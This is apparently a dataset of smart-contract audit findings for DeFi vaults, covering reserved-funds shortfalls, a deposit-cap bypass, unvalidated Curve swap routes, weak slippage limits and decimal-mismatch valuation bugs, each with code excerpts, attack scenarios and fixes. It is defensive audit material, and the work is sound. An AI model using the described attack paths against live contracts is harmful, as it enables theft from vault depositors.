doesn't check that savedTotalUnderlying >= reservedFundsчmediumчMainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedAmount. Because of that, shortage can occur, if vault will lose some underlying during cross chain calls and reservedFundswill not be present in the vault.\\n`reservedFunds` is the amount that is reserved to be withdrawn by users. It's increased by `totalWithdrawalRequests` amount every cycle, when `setXChainAllocation` is called.\\n`setXChainAllocation` call is initiated by xController. This call provides vault with information about funds. In case if vault should send funds to the xController, then `SendingFundsXChain` state is set, aslo amount to send is stored.\\n```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n\\nAs you can see, function just pulls needed funds from providers if needed and sends them to xController. It doesn't check that after that amount that is held by vault is enough to cover `reservedFunds`. Because of that next situation can occur.\\n1.Suppose that vault has 1000 tokens as underlying amount. 2.reservedFunds is 200. 3.xController calculated that vault should send 800 tokens to xController(vault allocations is 0) and 200 should be still in the vault in order to cover `reservedFunds`. 4.when vault is going to send 800 tokens(between `setXChainAllocation` and `rebalanceXChain` call), then loss happens and totalUnderlying becomes 800, so currently vault has only 800 tokens in total. 5.vault sends this 800 tokens to xController and has 0 to cover `reservedFunds`, but actually he should leave this 200 tokens in the vault in this case.\\n```\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n```\\n\\nI think that this is incorrect approach for withdrawing of funds as there is a risk that smth will happen with underlying amount in the providers, so it will be not enough to cover `reservedFunds` and calculations will be broken, users will not be able to withdraw. Same approach is done in `rebalance` function, which pulls `reservedFunds` after depositing to all providers. I guess that correct approach is not to touch `reservedFunds` amount. In case if you need to send amount to xController, then you need to withdraw it directly from provider. Of course if you have `getVaultBalance` that is bigger than `reservedFunds + amountToSendXChain`, then you can send them directly, without pulling.чYou need to check that after you send funds to xController it's enough funds to cover `reservedFunds`.чReserved funds protection can be brokenч```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n -maxTrainingDeposit can be bypassedчmediumчIt was observed that User can bypass the `maxTrainingDeposit` by transferring balance from one user to another\\nObserve the `deposit` function\\n```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n\\nSo if User balance exceeds maxTrainingDeposit then request fails (considering training is true)\\nLets say User A has balance of 50 and maxTrainingDeposit is 100\\nIf User A deposit amount 51 then it fails since 50+51<=100 is false\\nSo User A transfer amount 50 to his another account\\nNow when User A deposit, it does not fail since `0+51<=100`чIssue maxTrainingDeposit can be bypassed\\nIf user specific limit is required then transfer should be check below:\\n```\\n require(_amountTransferred + balanceRecepient <= maxTrainingDeposit);\\n```\\nчUser can bypass maxTrainingDeposit and deposit more than allowedч```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n -Risk of reward tokens being sold by malicious users under certain conditionsчhighчDue to the lack of validation of the selling token within the Curve adaptors, there is a risk that the reward tokens or Convex deposit tokens of the vault being sold by malicious users under certain conditions (e.g. if reward tokens equal to primary/secondary tokens OR a new exploit is found in other parts of the code).\\nFor a `EXACT_IN_SINGLE` trade within the Curve adaptors, the `from` and `to` addresses of the `exchange` function are explicitly set `to` `trade.sellToken` and `trade.buyToken` respectively. Thus, the swap is restricted `to` only `trade.sellToken` and `trade.buyToken`, which points `to` either the primary or secondary token of the pool. This prevents other tokens that reside in the vault `from` being swapped out.\\nHowever, this measure was not applied to the `EXACT_IN_BATCH` trade as it ignores the `trade.sellToken` and `trade.buyToken` , and allow the caller to define arbitrary `data.route` where the first route (_route[0]) and last route (_route[last_index]) could be any token.\\nThe vault will hold the reward tokens (CRV, CVX, LDO) when the vault administrator claims the rewards or a malicious user claims the rewards on behalf of the vault by calling Convex's getReward function.\\nAssume that attacker is faster than the admin calling the reinvest function. There is a possibility that an attacker executes a `EXACT_IN_BATCH` trade and specifies the `_route[0]` as one of the reward tokens residing on the vault and swaps away the reward tokens during depositing (_tradePrimaryForSecondary) or redemption (_sellSecondaryBalance). In addition, an attacker could also sell away the Convex deposit tokens if a new exploit is found.\\nIn addition, the vault also holds Convex deposit tokens, which represent assets held by the vault.\\nThis issue affects the in-scope `CurveV2Adapter` and `CurveAdapter` since they do not validate the `data.route` provided by the users.\\nCurveV2Adapter\\n```\\nFile: CurveV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 msgValue,\\n bytes memory executionCallData\\n )\\n {\\n if (trade.tradeType == TradeType.EXACT_IN_SINGLE) {\\n CurveV2SingleData memory data = abi.decode(trade.exchangeData, (CurveV2SingleData));\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange.selector,\\n data.pool,\\n _getTokenAddress(trade.sellToken),\\n _getTokenAddress(trade.buyToken),\\n trade.amount,\\n trade.limit,\\n address(this)\\n );\\n } else if (trade.tradeType == TradeType.EXACT_IN_BATCH) {\\n CurveV2BatchData memory data = abi.decode(trade.exchangeData, (CurveV2BatchData));\\n // Array of pools for swaps via zap contracts. This parameter is only needed for\\n // Polygon meta-factories underlying swaps.\\n address[4] memory pools;\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange_multiple.selector,\\n data.route,\\n data.swapParams,\\n trade.amount,\\n trade.limit,\\n pools,\\n address(this)\\n );\\n```\\n\\nCurveAdapter\\n```\\nFile: CurveAdapter.sol\\n function _exactInBatch(Trade memory trade) internal view returns (bytes memory executionCallData) {\\n CurveBatchData memory data = abi.decode(trade.exchangeData, (CurveBatchData));\\n\\n return abi.encodeWithSelector(\\n ICurveRouter.exchange.selector,\\n trade.amount,\\n data.route,\\n data.indices,\\n trade.limit\\n );\\n }\\n```\\n\\nFollowing are some examples of where this vulnerability could potentially be exploited. Assume a vault that supports the CurveV2's ETH/stETH pool.\\nPerform the smallest possible redemption to trigger the `_sellSecondaryBalance` function. Configure the `RedeemParams` to swap the reward token (CRV, CVX, or LDO) or Convex Deposit token for the primary token (ETH). This will cause the `finalPrimaryBalance` to increase by the number of incoming primary tokens (ETH), thus inflating the number of primary tokens redeemed.\\nPerform the smallest possible deposit to trigger the `_tradePrimaryForSecondary`. Configure `DepositTradeParams` to swap the reward token (CRV, CVX, or LDO) or Convex Deposit token for the secondary tokens (stETH). This will cause the `secondaryAmount` to increase by the number of incoming secondary tokens (stETH), thus inflating the number of secondary tokens available for the deposit.\\nUpon further investigation, it was observed that the vault would only approve the exchange to pull the `trade.sellToken`, which points to either the primary token (ETH) or secondary token (stETH). Thus, the reward tokens (CRV, CVX, or LDO) or Convex deposit tokens cannot be sent to the exchanges. Thus, the vault will not be affected if none of the reward tokens/Convex Deposit tokens equals the primary or secondary token.\\n```\\nFile: TradingUtils.sol\\n /// @notice Approve exchange to pull from this contract\\n /// @dev approve up to trade.amount for EXACT_IN trades and up to trade.limit\\n /// for EXACT_OUT trades\\n function _approve(Trade memory trade, address spender) private {\\n uint256 allowance = _isExactIn(trade) ? trade.amount : trade.limit;\\n address sellToken = trade.sellToken;\\n // approve WETH instead of ETH for ETH trades if\\n // spender != address(0) (checked by the caller)\\n if (sellToken == Constants.ETH_ADDRESS) {\\n sellToken = address(Deployments.WETH);\\n }\\n IERC20(sellToken).checkApprove(spender, allowance);\\n }\\n```\\n\\nHowever, there might be some Curve Pools or Convex's reward contracts whose reward tokens are similar to the primary or secondary tokens of the vault. If the vault supports those pools, the vault will be vulnerable. In addition, the reward tokens of a Curve pool or Convex's reward contracts are not immutable. It is possible for the governance to add a new reward token that might be the same as the primary or secondary token.чIt is recommended to implement additional checks when performing a `EXACT_IN_BATCH` trade with the `CurveV2Adapter` or `CurveAdapter` adaptor. The first item in the route must be the `trade.sellToken`, and the last item in the route must be the `trade.buyToken`. This will restrict the `trade.sellToken` to the primary or secondary token, and prevent reward and Convex Deposit tokens from being sold (Assuming primary/secondary token != reward tokens).\\n```\\nroute[0] == trade.sellToken\\nroute[last index] == trade.buyToken\\n```\\n\\nThe vault holds many Convex Deposit tokens (e.g. cvxsteCRV). A risk analysis of the vault shows that the worst thing that could happen is that all the Convex Deposit tokens are swapped away if a new exploit is found, which would drain the entire vault. For defense-in-depth, it is recommended to check that the selling token is not a Convex Deposit token under any circumstance when using the trade adaptor.\\nThe trade adaptors are one of the attack vectors that the attacker could potentially use to move tokens out of the vault if any exploit is found. Thus, they should be locked down or restricted where possible.\\nAlternatively, consider removing the `EXACT_IN_BATCH` trade function from the affected adaptors to reduce the attack surface if the security risk of this feature outweighs the benefit of the batch function.чThere is a risk that the reward tokens or Convex deposit tokens of the vault are sold by malicious users under certain conditions (e.g. if reward tokens are equal to primary/secondary tokens OR a new exploit is found in other parts of the code), thus potentially draining assets from the vault.ч```\\nFile: CurveV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 msgValue,\\n bytes memory executionCallData\\n )\\n {\\n if (trade.tradeType == TradeType.EXACT_IN_SINGLE) {\\n CurveV2SingleData memory data = abi.decode(trade.exchangeData, (CurveV2SingleData));\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange.selector,\\n data.pool,\\n _getTokenAddress(trade.sellToken),\\n _getTokenAddress(trade.buyToken),\\n trade.amount,\\n trade.limit,\\n address(this)\\n );\\n } else if (trade.tradeType == TradeType.EXACT_IN_BATCH) {\\n CurveV2BatchData memory data = abi.decode(trade.exchangeData, (CurveV2BatchData));\\n // Array of pools for swaps via zap contracts. This parameter is only needed for\\n // Polygon meta-factories underlying swaps.\\n address[4] memory pools;\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange_multiple.selector,\\n data.route,\\n data.swapParams,\\n trade.amount,\\n trade.limit,\\n pools,\\n address(this)\\n );\\n```\\n -Slippage/Minimum amount does not work during single-side redemptionчhighчThe slippage or minimum amount of tokens to be received is set to a value much smaller than expected due to the use of `TwoTokenPoolUtils._getMinExitAmounts` function to automatically compute the slippage or minimum amount on behalf of the callers during a single-sided redemption. As a result, the vault will continue to redeem the pool tokens even if the trade incurs significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.\\nThe `Curve2TokenConvexHelper._executeSettlement` function is called by the following functions:\\n`Curve2TokenConvexHelper.settleVault`\\n`Curve2TokenConvexHelper.settleVault` function is called within the `Curve2TokenConvexVault.settleVaultNormal` and `Curve2TokenConvexVault.settleVaultPostMaturity` functions\\n`Curve2TokenConvexHelper.settleVaultEmergency`\\n`Curve2TokenConvexHelper.settleVaultEmergency` is called by `Curve2TokenConvexVault.settleVaultEmergency`\\nIn summary, the `Curve2TokenConvexHelper._executeSettlement` function is called during vault settlement.\\nAn important point to note here is that within the `Curve2TokenConvexHelper._executeSettlement` function, the `params.minPrimary` and `params.minSecondary` are automatically computed and overwritten by the `TwoTokenPoolUtils._getMinExitAmounts` function (Refer to Line 124 below). Therefore, if the caller attempts to define the `params.minPrimary` and `params.minSecondary`, they will be discarded and overwritten. The `params.minPrimary` and `params.minSecondary` is for slippage control when redeeming the Curve's LP tokens.\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n\\nThe `TwoTokenPoolUtils._getMinExitAmounts` function calculates the minimum amount on the share of the pool with a small discount.\\nAssume a Curve Pool with the following configuration:\\nConsist of two tokens (DAI and USDC). DAI is primary token, USDC is secondary token.\\nPool holds 200 US Dollars worth of tokens (50 DAI and 150 USDC).\\nDAI <> USDC price is 1:1\\ntotalSupply = 100 LP Pool Tokens\\nAssume that 50 LP Pool Tokens will be claimed during vault settlement.\\n```\\nminPrimary = (poolContext.primaryBalance * poolClaim * strategyContext.vaultSettings.poolSlippageLimitPercent / (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)\\nminPrimary = (50 DAI * 50 LP_TOKEN * 99.75% / (100 LP_TOKEN * 100%)\\n\\nRewrite for clarity (ignoring rounding error):\\nminPrimary = 50 DAI * (50 LP_TOKEN/100 LP_TOKEN) * (99.75%/100%) = 24.9375 DAI\\n\\nminSecondary = same calculation = 74.8125 USDC\\n```\\n\\n`TwoTokenPoolUtils._getMinExitAmounts` function will return `24.9375 DAI` as `params.minPrimary` and `74.8125 USDC` as `params.minSecondary`.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice calculates the expected primary and secondary amounts based on\\n /// the given spot price and oracle price\\n function _getMinExitAmounts(\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 spotPrice,\\n uint256 oraclePrice,\\n uint256 poolClaim\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n\\n // min amounts are calculated based on the share of the Balancer pool with a small discount applied\\n uint256 totalPoolSupply = poolContext.poolToken.totalSupply();\\n minPrimary = (poolContext.primaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n minSecondary = (poolContext.secondaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n }\\n```\\n\\nWhen settling the vault, it is possible to instruct the vault to redeem the Curve's LP tokens single-sided or proportionally. Settle vault functions will trigger a chain of functions that will eventually call the `Curve2TokenConvexHelper._unstakeAndExitPool` function that is responsible for redeeming the Curve's LP tokens.\\nWithin the `Curve2TokenConvexHelper._unstakeAndExitPool` function, if the `params.secondaryTradeParams.length` is zero, the redemption will be single-sided (refer to Line 242 below). Otherwise, the redemption will be executed proportionally (refer to Line 247 below). For a single-sided redemption, only the `params.minPrimary` will be used.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _unstakeAndExitPool(\\n Curve2TokenPoolContext memory poolContext,\\n ConvexStakingContext memory stakingContext,\\n uint256 poolClaim,\\n RedeemParams memory params\\n ) internal returns (uint256 primaryBalance, uint256 secondaryBalance) {\\n // Withdraw pool tokens back to the vault for redemption\\n bool success = stakingContext.rewardPool.withdrawAndUnwrap(poolClaim, false); // claimRewards = false\\n if (!success) revert Errors.UnstakeFailed();\\n\\n if (params.secondaryTradeParams.length == 0) {\\n // Redeem single-sided\\n primaryBalance = ICurve2TokenPool(address(poolContext.curvePool)).remove_liquidity_one_coin(\\n poolClaim, int8(poolContext.basePool.primaryIndex), params.minPrimary\\n );\\n } else {\\n // Redeem proportionally\\n uint256[2] memory minAmounts;\\n minAmounts[poolContext.basePool.primaryIndex] = params.minPrimary;\\n minAmounts[poolContext.basePool.secondaryIndex] = params.minSecondary;\\n uint256[2] memory exitBalances = ICurve2TokenPool(address(poolContext.curvePool)).remove_liquidity(\\n poolClaim, minAmounts\\n );\\n\\n (primaryBalance, secondaryBalance) \\n = (exitBalances[poolContext.basePool.primaryIndex], exitBalances[poolContext.basePool.secondaryIndex]);\\n }\\n }\\n```\\n\\nAssume that the caller decided to perform a single-sided redemption of 50 LP Pool Tokens, using the earlier example. In this case,\\n`poolClaim` = 50 LP Pool Tokens\\n`params.minPrimary` = 24.9375 DAI\\n`params.minSecondary` = 74.8125 USDC\\nThe data passed into the `remove_liquidity_one_coin` will be as follows:\\n```\\n@notice Withdraw a single coin from the pool\\n@param _token_amount Amount of LP tokens to burn in the withdrawal\\n@param i Index value of the coin to withdraw\\n@param _min_amount Minimum amount of coin to receive\\n@return Amount of coin received\\ndef remove_liquidity_one_coin(\\n _token_amount: uint256,\\n i: int128,\\n _min_amount: uint256\\n) -> uint256:\\n```\\n\\n```\\nremove_liquidity_one_coin(poolClaim, int8(poolContext.basePool.primaryIndex), params.minPrimary);\\nremove_liquidity_one_coin(50 LP_TOKEN, Index 0=DAI, 24.9375 DAI);\\n```\\n\\nAssume the pool holds 200 US dollars worth of tokens (50 DAI and 150 USDC), and the total supply is 100 LP Tokens. The pool's state is imbalanced, so any trade will result in significant slippage.\\nIntuitively (ignoring the slippage & fee), redeeming 50 LP Tokens should return approximately 100 US dollars worth of tokens, which means around 100 DAI. Thus, the slippage or minimum amount should ideally be around 100 DAI (+/- 5%).\\nHowever, the trade will be executed in the above example even if the vault receives only 25 DAI because the `params.minPrimary` is set to `24.9375 DAI`. This could result in a loss of around 75 DAI due to slippage (about 75% slippage rate) in the worst-case scenario.чWhen performing a single-side redemption, avoid using the `TwoTokenPoolUtils._getMinExitAmounts` function to automatically compute the slippage or minimum amount of tokens to receive on behalf of the caller. Instead, give the caller the flexibility to define the slippage (params.minPrimary). To prevent the caller from setting a slippage that is too large, consider restricting the slippage to an acceptable range.\\nThe proper way of computing the minimum amount of tokens to receive from a single-side trade (remove_liquidity_one_coin) is to call the Curve Pool's `calc_withdraw_one_coin` function off-chain to calculate the amount received when withdrawing a single LP Token, and then apply an acceptable discount.\\nNote that the `calc_withdraw_one_coin` function cannot be used solely on-chain for computing the minimum amount because the result can be manipulated since it uses spot balances for computation.чThe slippage or minimum amount of tokens to be received is set to a value much smaller than expected. Thus, the vault will continue to redeem the pool tokens even if the trade incurs significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.ч```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n -Reinvest will return sub-optimal return if the pool is imbalancedчhighчReinvesting only allows proportional deposit. If the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal. This result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of gain for the vault shareholder.\\nDuring reinvest rewards, the vault will ensure that the amount of primary and secondary tokens deposited is of the right proportion per the comment in Line 163 below.\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function reinvestReward(\\n Curve2TokenConvexStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n..SNIP..\\n // Make sure we are joining with the right proportion to minimize slippage\\n poolContext._validateSpotPriceAndPairPrice({\\n strategyContext: strategyContext,\\n oraclePrice: poolContext.basePool._getOraclePairPrice(strategyContext),\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n\\nThe `Curve2TokenConvexHelper.reinvestReward` function will internally call the `Curve2TokenPoolUtils._checkPrimarySecondaryRatio`, which will check that the primary and secondary tokens deposited are of the right proportion.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _checkPrimarySecondaryRatio(\\n StrategyContext memory strategyContext,\\n uint256 primaryAmount, \\n uint256 secondaryAmount, \\n uint256 primaryPoolBalance, \\n uint256 secondaryPoolBalance\\n ) private pure {\\n uint256 totalAmount = primaryAmount + secondaryAmount;\\n uint256 totalPoolBalance = primaryPoolBalance + secondaryPoolBalance;\\n\\n uint256 primaryPercentage = primaryAmount * CurveConstants.CURVE_PRECISION / totalAmount; \\n uint256 expectedPrimaryPercentage = primaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedPrimaryPercentage, primaryPercentage);\\n\\n uint256 secondaryPercentage = secondaryAmount * CurveConstants.CURVE_PRECISION / totalAmount;\\n uint256 expectedSecondaryPercentage = secondaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedSecondaryPercentage, secondaryPercentage);\\n }\\n```\\n\\nThis concept of proportional join appears to be taken from the design of earlier Notional's Balancer leverage vaults. For Balancer Pools, it is recommended to join with all the pool's tokens in exact proportions to minimize the price impact of the join (Reference).\\nHowever, the concept of proportional join to minimize slippage does not always hold for Curve Pools as they operate differently.\\nA Curve pool is considered imbalanced when there is an imbalance between the assets within it. For instance, the Curve stETH/ETH pool is considered imbalanced if it has the following reserves:\\nETH: 340,472.34 (31.70%)\\nstETH: 733,655.65 (68.30%)\\nIf a Curve Pool is imbalanced, attempting to perform a proportional join will not give an optimal return (e.g. result in fewer Pool LP tokens received).\\nIn Curve Pool, there are penalties/bonuses when depositing to a pool. The pools are always trying to balance themselves. If a deposit helps the pool to reach that desired balance, a deposit bonus will be given (receive extra tokens). On the other hand, if a deposit deviates from the pool from the desired balance, a deposit penalty will be applied (receive fewer tokens).\\n```\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256) -> uint256:\\n..SNIP..\\n if token_supply > 0:\\n # Only account for fees if we are not the first to deposit\\n fee: uint256 = self.fee * N_COINS / (4 * (N_COINS - 1))\\n admin_fee: uint256 = self.admin_fee\\n for i in range(N_COINS):\\n ideal_balance: uint256 = D1 * old_balances[i] / D0\\n difference: uint256 = 0\\n if ideal_balance > new_balances[i]:\\n difference = ideal_balance - new_balances[i]\\n else:\\n difference = new_balances[i] - ideal_balance\\n fees[i] = fee * difference / FEE_DENOMINATOR\\n if admin_fee != 0:\\n self.admin_balances[i] += fees[i] * admin_fee / FEE_DENOMINATOR\\n new_balances[i] -= fees[i]\\n D2 = self.get_D(new_balances, amp)\\n mint_amount = token_supply * (D2 - D0) / D0\\n else:\\n mint_amount = D1 # Take the dust if there was any\\n..SNIP..\\n```\\n\\nFollowing is the mathematical explanation of the penalties/bonuses extracted from Curve's Discord channel:\\nThere is a “natural” amount of D increase that corresponds to a given total deposit amount; when the pool is perfectly balanced, this D increase is optimally achieved by a balanced deposit. Any other deposit proportions for the same total amount will give you less D.\\nHowever, when the pool is imbalanced, a balanced deposit is no longer optimal for the D increase.чConsider removing the `_checkPrimarySecondaryRatio` function from the `_validateSpotPriceAndPairPrice` function to give the callers the option to deposit the reward tokens in a \"non-proportional\" manner if a Curve Pool becomes imbalanced so that the deposit penalty could be minimized or the deposit bonus can be exploited to increase the return.чThere is no guarantee that a Curve Pool will always be balanced. Historically, there are multiple instances where the largest Curve pool (stETH/ETH) becomes imbalanced (Reference #1 and #2).\\nIf the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal, leading to the trade resulting in fewer tokens than possible due to the deposit penalty. In addition, the trade also misses out on the potential gain from the deposit bonus.\\nThe side-effect is that reinvesting the reward tokens will result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of gain for the vault shareholder.ч```\\nFile: Curve2TokenConvexHelper.sol\\n function reinvestReward(\\n Curve2TokenConvexStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n..SNIP..\\n // Make sure we are joining with the right proportion to minimize slippage\\n poolContext._validateSpotPriceAndPairPrice({\\n strategyContext: strategyContext,\\n oraclePrice: poolContext.basePool._getOraclePairPrice(strategyContext),\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n -Curve vault will undervalue or overvalue the LP Pool tokens if it comprises tokens with different decimalsчhighчA Curve vault that comprises tokens with different decimals will undervalue or overvalue the LP Pool tokens. As a result, users might be liquidated prematurely or be able to borrow more than they are allowed. Additionally, the vault settlement process might break.\\nThe `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function, which is utilized by the Curve vault, is used to compute the total value of the LP Pool tokens (poolClaim) denominated in the primary token.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n ) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n\\n // Make sure primaryAmount is reported in primaryPrecision\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n }\\n```\\n\\nIf a leverage vault supports a Curve Pool that contains two tokens with different decimals, the math within the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function would not work, and the value returned from it will be incorrect. Consider the following two scenarios:\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6)\\nTo illustrate the issue, assume the following:\\nThe leverage vault supports the DAI-USDC Curve Pool, and its primary token of the vault is DAI.\\nDAI's decimals are 18, while USDC's decimals are 6.\\nCurve Pool's total supply is 100\\nThe Curve Pool holds 100 DAI and 100 USDC\\nFor the sake of simplicity, the price of DAI and USDC is 1:1. Thus, the `oraclePrice` within the function will be `1 * 10^18`. Note that the oracle price is always scaled up to 18 decimals within the vault.\\nThe caller of the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function wanted to compute the total value of 50 LP Pool tokens.\\n```\\nprimaryBalance = poolContext.primaryBalance * poolClaim / totalSupply; // 100 DAI * 50 / 100\\nsecondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply; // 100 USDC * 50 / 100\\n```\\n\\nThe `primaryBalance` will be `50 DAI`. `50 DAI` denominated in WEI will be `50 * 10^18` since the decimals of DAI are 18.\\nThe `secondaryBalance` will be `50 USDC`. `50 USDC` denominated in WEI will be `50 * 10^6` since the decimals of USDC are 6.\\nNext, the code logic attempts to value the secondary balance (50 USDC) in terms of the primary token (DAI) using the oracle price (1 * 10^18).\\n```\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = 50 USDC * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n```\\n\\n50 USDC should be worth 50 DAI (50 * 10^18). However, the `secondaryAmountInPrimary` shows that it is only worth 0.00000000005 DAI (50 * 10^6).\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\nprimaryAmount = [(50 * 10^18) + (50 * 10^6)] * 10^18 / 10^18\\nprimaryAmount = [(50 * 10^18) + (50 * 10^6)] // cancel out the 10^18\\nprimaryAmount = 50 DAI + 0.00000000005 DAI = 50.00000000005 DAI\\n```\\n\\n50 LP Pool tokens should be worth 100 DAI. However, the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function shows that it is only worth 50.00000000005 DAI, which undervalues the LP Pool tokens.\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18)\\nTo illustrate the issue, assume the following:\\nThe leverage vault supports the DAI-USDC Curve Pool, and its primary token of the vault is USDC.\\nUSDC's decimals are 6, while DAI's decimals are 